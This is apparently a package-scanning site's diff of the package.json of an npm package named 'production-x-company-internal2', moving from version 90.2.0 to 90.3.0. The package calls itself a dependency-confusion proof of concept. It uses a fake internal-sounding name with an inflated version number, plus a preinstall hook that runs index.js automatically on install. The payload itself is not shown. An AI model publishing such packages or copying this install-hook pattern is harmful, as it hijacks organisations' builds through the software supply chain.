production-x-company-internal2 90.2.0 → 90.3.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (1) hide show
  1. package/package.json +2 -2
package/package.json CHANGED
@@ -1,15 +1,15 @@
1
1
  {
2
2
  "name": "production-x-company-internal2",
3
- "version": "90.2.0",
3
+ "version": "90.3.0",
4
4
  "description": "No malicious. Just a package for POC of dependency confusion.",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
- "test": "echo \"Error: no test specified\" && exit 1",
8
7
  "preinstall": "node index.js"
9
8
  },
10
9
  "author": "Tropine",
11
10
  "license": "ISC",
12
11
  "dependencies": {
12
+ "production-x-company-internal2": "^90.2.0",
13
13
  "xmlhttprequest": "^1.8.0"
14
14
  }
15
15
  }